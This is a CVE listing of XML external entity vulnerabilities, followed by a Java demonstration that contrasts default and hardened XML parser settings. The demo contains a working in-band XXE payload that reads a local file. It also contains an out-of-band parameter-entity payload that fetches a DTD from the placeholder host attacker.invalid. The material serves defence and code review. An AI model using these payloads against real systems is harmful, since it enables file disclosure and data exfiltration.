Total: 1035 CVE
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description
---|---|---|---|---|---|---
CVE-2021-44477 | 1 Ge | 1 Toolboxst | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH | GE Gas Power ToolBoxST Version v04.07.05C suffers from an XML external entity (XXE) vulnerability using the DTD parameter entities technique that could result in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML project/template file.
CVE-2021-44147 | 1 Claris | 2 Filemaker Pro, Filemaker Server | 2024-11-21 | 4.3 MEDIUM | 5.5 MEDIUM | An XML External Entity issue in Claris FileMaker Pro and Server (including WebDirect) before 19.4.1 allows a remote attacker to disclose local files via a crafted XML/Excel document and perform server-side request forgery attacks.
CVE-2021-44028 | 1 Quest | 1 Kace Desktop Authority | 2024-11-21 | 4.3 MEDIUM | 5.5 MEDIUM | XXE can occur in Quest KACE Desktop Authority before 11.2 because the log4net configuration file might be controlled by an attacker, a related issue to CVE-2018-1285.
CVE-2021-43990 | 1 Fanuc | 1 Roboguide | 2024-11-21 | 2.6 LOW | 6.1 MEDIUM | The affected product is vulnerable to a network-based attack by threat actors supplying a crafted, malicious XML payload designed to trigger an external entity reference call.
CVE-2021-43577 | 1 Jenkins | 1 Owasp Dependency-check | 2024-11-21 | 5.5 MEDIUM | 7.1 HIGH | Jenkins OWASP Dependency-Check Plugin 5.1.1 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.
CVE-2021-43576 | 1 Jenkins | 1 Pom2config | 2024-11-21 | 4.3 MEDIUM | 6.5 MEDIUM | Jenkins pom2config Plugin 1.2 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks, allowing attackers with Overall/Read and Item/Read permissions to have Jenkins parse a crafted XML file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.
CVE-2021-43142 | 1 Jox Project | 1 Jox | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL | An XML External Entity (XXE) vulnerability exists in wuta jox 1.16 in the readObject method in JOXSAXBeanInput.
CVE-2021-43090 | 1 Predic8 | 1 Soa Model | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL | An XML External Entity (XXE) vulnerability exists in soa-model before 1.6.4 in the WSDLParser function.
CVE-2021-42776 | 1 Cloverdx | 1 Cloverdx | 2024-11-21 | 6.8 MEDIUM | 7.7 HIGH | CloverDX Server before 5.11.2 and 5.12.x before 5.12.1 allows XXE during configuration import.
CVE-2021-42646 | 1 Wso2 | 3 Api Manager, Identity Server, Identity Server As Key Manager | 2024-11-21 | 6.4 MEDIUM | 9.1 CRITICAL | XML External Entity (XXE) vulnerability in the file based service provider creation feature of the Management Console in WSO2 API Manager 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; WSO2 IS as Key Manager 5.7.0, 5.9.0, and 5.10.0; and WSO2 Identity Server 5.7.0, 5.8.0, 5.9.0, 5.10.0, and 5.11.0. Allows attackers to gain read access to sensitive information or cause a denial of service via crafted GET requests.
CVE-2021-42560 | 1 Mitre | 1 Caldera | 2024-11-21 | 6.5 MEDIUM | 8.8 HIGH | An issue was discovered in CALDERA 2.9.0. The Debrief plugin receives base64 encoded "SVG" parameters when generating a PDF document. These SVG documents are parsed in an unsafe manner and can be leveraged for XXE attacks (e.g., file exfiltration, server-side request forgery, out-of-band exfiltration, etc.).
CVE-2021-42537 | 1 Visam | 1 Vbase Web-remote | 2024-11-21 | N/A | 5.9 MEDIUM | VISAM VBASE version 11.6.0.6 processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
CVE-2021-42194 | 1 Eyoucms | 1 Eyoucms | 2024-11-21 | 6.5 MEDIUM | 7.2 HIGH | The wechat_return function in /controller/Index.php of EyouCms V1.5.4-UTF8-SP3 passes the user's input directly into the simplexml_load_string function, which itself does not prohibit external entities, triggering an XML external entity (XXE) injection vulnerability.
CVE-2021-41770 | 1 Pingidentity | 1 Pingfederate | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH | Ping Identity PingFederate before 10.3.1 mishandles pre-parsing validation, leading to an XXE attack that can achieve XML file disclosure.
CVE-2021-41411 | 1 Redhat | 1 Drools | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL | drools <=7.59.x is affected by an XML External Entity (XXE) vulnerability in KieModuleMarshaller.java. The Validator class is not used correctly, resulting in the XXE injection vulnerability.
CVE-2021-41098 | 1 Nokogiri | 1 Nokogiri | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH | Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri v1.12.4 and earlier, on JRuby only, the SAX parser resolves external entities by default. Users of Nokogiri on JRuby who parse untrusted documents using any of these classes are affected: Nokogiri::XML::SAX::Parser, Nokogiri::HTML4::SAX::Parser or its alias Nokogiri::HTML::SAX::Parser, Nokogiri::XML::SAX::PushParser, and Nokogiri::HTML4::SAX::PushParser or its alias Nokogiri::HTML::SAX::PushParser. JRuby users should upgrade to Nokogiri v1.12.5 or later to receive a patch for this issue. There are no workarounds available for v1.12.4 or earlier. CRuby users are not affected.
CVE-2021-41042 | 1 Eclipse | 1 Lyo | 2024-11-21 | 5.0 MEDIUM | 5.3 MEDIUM | In Eclipse Lyo versions 1.0.0 to 4.1.0, a TransformerFactory is initialized with the defaults that do not restrict DTD loading when working with RDF/XML. This allows an attacker to cause an external DTD to be retrieved.
CVE-2021-40722 | 1 Adobe | 2 Experience Manager, Experience Manager Cloud Service | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL | AEM Forms Cloud Service offering, as well as version 6.5.10.0 (and below), are affected by an XML External Entity (XXE) injection vulnerability that could be abused by an attacker to achieve RCE.
CVE-2021-40510 | 1 Obdasystems | 1 Mastro | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH | XML eXternal Entity (XXE) in OBDA Systems' Mastro 1.0 allows remote attackers to read system files via custom DTDs.
CVE-2021-40500 | 1 Sap | 1 Businessobjects Business Intelligence Platform | 2024-11-21 | 5.0 MEDIUM | 7.5 HIGH | SAP BusinessObjects Business Intelligence Platform (Crystal Reports) versions 420 and 430 allow an unauthenticated attacker to exploit missing XML validations at endpoints to read sensitive data. These endpoints are normally exposed over the network and successful exploitation can enable the attacker to retrieve arbitrary files from the server.
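Most entries above (the Jenkins plugins, drools, soa-model, jox, Lyo) share one root cause: a JAXP parser left at library defaults, which resolve external entities and fetch external DTDs. The program below is an added example written for this page, not code from any listed vendor or from NVD. It builds a crafted document inline, parses it with the JDK's default DocumentBuilderFactory (which, with the JDK's built-in Xerces, expands the SYSTEM entity and returns the referenced file's content), then shows the same document and a parameter-entity variant of the kind referenced in the ToolBoxST entry being rejected by a factory hardened with the usual XXE prevention settings, plus the matching TransformerFactory attributes the Lyo entry implies. The temp file, its contents, the element names and the placeholder host `attacker.invalid` are constructed for the example.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.TransformerFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class XxeDemo {

    // Constructed in-band payload: a general entity whose replacement text is
    // the content of a local file, referenced from the document body.
    static String inBandPayload(Path secret) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE project [\n"
             + "  <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">\n"
             + "]>\n"
             + "<project><name>&xxe;</name></project>";
    }

    // Constructed parameter-entity (out-of-band) variant: the external DTD
    // would build a URL carrying the file content, so data leaks even when the
    // application echoes nothing back. Only ever fed to the hardened factory
    // here; attacker.invalid is a placeholder that resolves nowhere.
    static final String OOB_PAYLOAD =
          "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE project [\n"
        + "  <!ENTITY % file SYSTEM \"file:///etc/hostname\">\n"
        + "  <!ENTITY % dtd SYSTEM \"http://attacker.invalid/evil.dtd\">\n"
        + "  %dtd;\n"
        + "]>\n"
        + "<project/>";

    // Factory as the affected products used it: library defaults.
    static DocumentBuilderFactory defaultFactory() {
        return DocumentBuilderFactory.newInstance();
    }

    // Hardened factory: refuse any DOCTYPE (stops both entity variants), and
    // additionally disable entity resolution and external DTD loading for
    // parsers that do not honour disallow-doctype-decl.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }

    // Same fix for TransformerFactory: an empty protocol list means no
    // external DTD or stylesheet may be fetched during a transform.
    static TransformerFactory hardenedTransformerFactory() {
        TransformerFactory tf = TransformerFactory.newInstance();
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return tf;
    }

    // Parse and return the root element's text, i.e. whatever &xxe; expanded to.
    static String parseRootText(DocumentBuilderFactory dbf, String xml)
            throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilder db = dbf.newDocumentBuilder();
        Document doc = db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "db_password=hunter2");   // constructed secret
        String xml = inBandPayload(secret);

        // Default parser: the file content lands in the DOM.
        System.out.println("default : " + parseRootText(defaultFactory(), xml));

        // Hardened parser: SAXParseException before any entity is resolved.
        for (String payload : new String[] { xml, OOB_PAYLOAD }) {
            try {
                parseRootText(hardenedFactory(), payload);
                System.out.println("hardened: parsed (unexpected)");
            } catch (SAXException e) {
                System.out.println("hardened: rejected - " + e.getMessage());
            }
        }
        hardenedTransformerFactory();
        Files.deleteIfExists(secret);
    }
}
```

The disallow-doctype-decl feature is the single setting to check first in a code review, because it rejects the document before any entity, general or parameter, is declared; the remaining features matter for parsers that do not recognise it, and for code paths that legitimately need a DTD and therefore cannot use it.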